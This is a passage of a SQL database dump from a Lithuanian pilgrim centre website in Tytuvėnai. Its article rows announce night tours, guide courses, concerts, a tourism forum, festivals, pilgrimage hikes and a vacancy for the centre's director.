font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><strong>DĖMESIO!</strong> Skelbiame naktinių ekskursijų po Tytuvėnų bažnyčios ir vienuolyno ansamblį sezono atidarymą! <br /></span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">Naktinė ekskursija „Miestelis ir vienuolynas. Vakaro sutemos“ vyks kiekvieno mėnesio 7 dieną.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><span><span><span><span>Sezonas 2021 10 07 – 2022 04 07. BŪTINA IŠANKSTINĖ REGISTRACIJA. </span></span></span></span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><span><span><span>Tel. nr.: 8 675 58506, el. paštu: <a href=\"mailto:info@infotytuvenai.lt\" target=\"_blank\">info@infotytuvenai.lt</a></span></span></span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><span><span><span><span>Minimalus dalyvių skaičius – 12, maksimalus – 25. Nesusirinkus minimaliam dalyviui skaičiui, ekskursija neįvyks.</span></span></span></span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><span><span><span><span>Kaina asmeniui – 7 eur.</span></span></span></span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><span><span><span><span><span>{gallery cols=2 width=320}stories/naujienos/naktys{/gallery}</span></span></span></span></span></span></span></p>',1,0,0,44,'2021-09-21 19:29:00',135,'','2021-09-21 19:35:36',135,0,'0000-00-00 00:00:00','2021-09-21 19:29:00','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/naktys\\/main\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',17,0,27,'','',1,2901,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(365,454,'Gidų kursai','gidu-kursai','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Gidų kursai 2021-2022<br /></span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\"><img src=\"images/stories/naujienos/gidu_kursai/image001.jpg\" border=\"0\" alt=\"\" /></span></p>',1,0,0,44,'2021-09-30 18:47:58',135,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2021-09-30 18:47:58','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/gidu_kursai\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,0,25,'','',1,1390,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(366,455,'XVII a. itališkų vilanelių koncertas','xvii-a-italisku-vilaneliu-koncertas','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Spalio 10 d. 17 val. <br /> Vilanelos \"Mirštu dėl tavęs, o tu to nežinai\"<br /> Ansamblis Chiaroscuro<br /></span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\"><img src=\"images/stories/naujienos/mirstu_del_taves/2021 Chiaroscuro-Italiskos Vilanelos-programa (2)_page-0001.jpg\" border=\"0\" alt=\"\" /></span></p>',1,0,0,44,'2021-10-04 18:58:00',135,'','0000-00-00 00:00:00',0,135,'2021-10-04 18:58:00','2021-10-04 18:58:00','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/mirstu_del_taves\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,0,24,'','',1,1774,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(367,456,'V Šiaulių krašto turizmo forumas','v-siauliu-krasto-turizmo-forumas','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">2021 11 26<br />10.00 - 14.30 val.<br /></span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\"><img src=\"images/stories/naujienos/siauliu_krasto_forumas/plakatas.jpg\" border=\"0\" alt=\"\" /></span></p>',1,0,0,44,'2021-11-24 05:11:58',135,'','2021-11-24 05:12:46',135,0,'0000-00-00 00:00:00','2021-11-24 05:11:58','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/siauliu_krasto_forumas\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,0,23,'','',1,7872,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(368,457,'Konkursas','konkursas','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Kelmės rajono savivaldybė skelbia konkursą VŠĮ Tytuvėnų piligrimų centro direktoriaus pareigoms eiti. <a href=\"images/stories/naujienos/darb/aprasas.docx\" target=\"_blank\"><img src=\"images/stories/naujienos/darb/word.png\" border=\"0\" width=\"40\" /></a><br /></span></p>\r\n','\r\n<p><strong>VŠĮ TYTUVĖNŲ PILIGRIMŲ CENTRO DIREKTORIUS</strong></p>\r\n<p>Kelmės rajono savivaldybė skelbia konkursą VŠĮ Tytuvėnų piligrimų centro direktoriaus pareigoms eiti. Pareiginė alga 1289 eur. (prieš mokesčius)</p>\r\n<p><strong>Kvalifikaciniai reikalavimai pretendentui:</strong></p>\r\n<ul>\r\n<li>Turėti aukštąjį universitetinį išsilavinimą. </li>\r\n<li>Turėti ne mažesnę kaip 3 metų darbo patirtį.</li>\r\n<li>     Išmanyti Lietuvos Respublikos Konstituciją, Lietuvos Respublikos muziejų įstatymą, Lietuvos respublikos vietos savivaldos įstatymą, Lietuvos Respublikos viešųjų įstaigų įstatymą, Lietuvos respublikos darbo kodeksą, sugebėti juos taikyti praktikoje.</li>\r\n<li>Būti susipažinus su Romos Katalikų Bažnyčios nuostatomis.</li>\r\n<li>Turėti įgūdžių strateginio planavimo, išteklių ir personalo valdymo srityse.</li>\r\n<li>Mokėti vertinti, analizuoti veiklos programas – projektus.</li>\r\n<li>Mokėti organizuoti ir planuoti centro darbą.</li>\r\n<li>Žinoti pagrindinius bendravimo ir bendradarbiavimo principus bei etikos normas.</li>\r\n<li>Išmanyti raštvedybos reikalavimus, sklandžiai dėstyti   mintis raštu ir žodžiu.</li>\r\n<li>Turėti kompiuterinio raštingumo įgūdžių.</li>\r\n<li>Profesionaliai tvarkyti dokumentus, sisteminti gautą informaciją.</li>\r\n<li>Būti kūrybiškam, komunikabiliam, iniciatyviam, pareigingam.</li>\r\n<li>Privalumas turėti vairuotojo pažymėjimą.</li>\r\n</ul>\r\n<p><strong>Pretendentai turi pateikti šiuos dokumentus:</strong>    </p>\r\n<ul>\r\n<li>Prašymą leisti dalyvauti konkurse.</li>\r\n<li>Asmens tapatybę patvirtinantį dokumentą, išsilavinimą patvirtinantį dokumentą ir šių dokumentų kopijas.</li>\r\n<li>Gyvenimo aprašymą.</li>\r\n<li>Nepriekaištingos reputacijos deklaraciją (Pridedama).</li>\r\n<li>Savo, kaip įstaigos vadovo, veiklos programą.</li>\r\n</ul>\r\n<p>Pretendentai dokumentus turi pateikti Kelmės rajono savivaldybės administracijos Teisės ir personalo skyriui, adresu: Vytauto Didžiojo g. 58, Kelmė, 120 kab. tiesiogiai, elektroniniu paštu <a href=\"mailto:rimas.milkintas@kelme.lt\">rimas.milkintas@kelme.lt</a> arba registruotu laišku iki 2022 m. sausio 5 d. Dokumentų originalai, pateikiami tiesiogiai teikiant dokumentus arba atrankos dieną ir sutikrinti su kopijomis, grąžinami. Pretendentams, neatitinkantiems kvalifikacinių reikalavimų, nepateikusiems dokumentų ar sutikrinant nustačius, kad pateikti dokumentų originalai neatitinka dokumentų kopijų, neleidžiama dalyvauti konkurse.  Atrankos būdas - testas žodžiu.</p>\r\n<p>Informacija teikiama tel. 8 427 69157.</p>\r\n<p>Iki atrankos likus ne mažiau kaip 3 darbo dienoms pagal komisijos pirmininko sudarytą atrankos posėdžio darbotvarkę kiekvienam pretendentui bus praneštas individualus laikas atvykti į atranką, tiksli atrankos vieta ir numatoma trukmė.</p>\r\n<p> </p>\r\n<p>Teisės ir personalo vyriausiasis specialistas Rimas Milkintas</p>',0,0,0,44,'2021-12-16 19:10:23',135,'','2021-12-16 19:19:43',135,0,'0000-00-00 00:00:00','2021-12-16 19:10:23','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/darb\\/darb.png\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',7,0,22,'','',1,678,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(378,470,'Tytuvėnų šviesų festivalis','tytuvenu-sviesu-festivalis','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span>Spalio 29 d.</span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span>Tytuvėnų Švč. Mergelės Marijos Angelų Karalienės bažnyčia</span></span></p>\r\n','\r\n<p style=\"text-align: justify;\"><img src=\"images/stories/naujienos/sviesu_festivalis/sviesu_festivalis.jpg\" border=\"0\" width=\"1160\" style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\" /></p>\r\n<p style=\"text-align: justify;\"> </p>',1,0,0,44,'2022-10-03 20:43:45',135,'','2022-10-03 20:44:02',135,0,'0000-00-00 00:00:00','2022-10-03 20:43:45','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/sviesu_festivalis\\/sviesu_festivalis_main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,0,15,'','',1,3589,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(374,465,'Vakaro sutemos','vakaro-sutemos','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">DĖMESIO! Sugrįžta naktinių ekskursijų sezonas po Tytuvėnų bažnyčios ir vienuolyno ansamblį \"Miestelis ir vienuolynas. Vakaro sutemos\".</span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"> Ekskursijos vyks: spalio, lapkričio, gruodžio, sausio, vasario, kovo mėnesių 7 dienomis. BŪTINA IŠANKSTINĖ REGISRACIJA tel.: 8 675 58506.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"> Minimalus dalyvių skaičius - 15, maksimalus - 25. Kaina asmeniui - 9 eur. </span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\"><img src=\"images/stories/naujienos/vakaro_sutemos/skelbimas.jpg\" border=\"0\" width=\"1160\" height=\"773\" /></span></p>\r\n<p style=\"text-align: justify;\"> </p>',1,0,0,44,'2022-09-13 19:01:23',135,'','2022-09-13 19:03:48',135,0,'0000-00-00 00:00:00','2022-09-13 19:01:23','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/vakaro_sutemos\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,0,17,'','',1,3526,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(389,481,'Gyvasis paveldas','gyvasis-paveldas','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><strong>Europos paveldo dienų renginiai Kelmės rajone</strong></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span> 2023 m. rugsėjo 8 d.</span></span></p>\r\n','\r\n<p><strong><img src=\"images/stories/naujienos/gyvasis_paveldas/main.jpg\" border=\"0\" alt=\"\" /></strong></p>',1,0,0,44,'2023-09-06 04:40:28',135,'','2023-09-06 04:40:37',135,0,'0000-00-00 00:00:00','2023-09-06 04:40:28','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/gyvasis_paveldas\\/logo.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,0,4,'','',1,2507,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(369,458,'Piligriminins žygis','piligriminins-zygis','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Tema: \"Tėvo širdimi\" - Tėvu negimstama, tėvu tampama</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">2022 05 28<br />12.00 - 19.00 val.<br /></span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\"><img src=\"images/stories/naujienos/piligrimu_zygis_2022/plakatas.jpg\" border=\"0\" alt=\"\" /></span></p>',1,0,0,44,'2022-05-15 16:35:09',135,'','2022-05-15 16:36:29',135,0,'0000-00-00 00:00:00','2022-05-15 16:35:09','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/piligrimu_zygis_2022\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,0,21,'','',1,1128,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(370,461,'Žygis  keliu \"Via Gratiarum\"','zygis-keliu-via-gratiarum','','<p 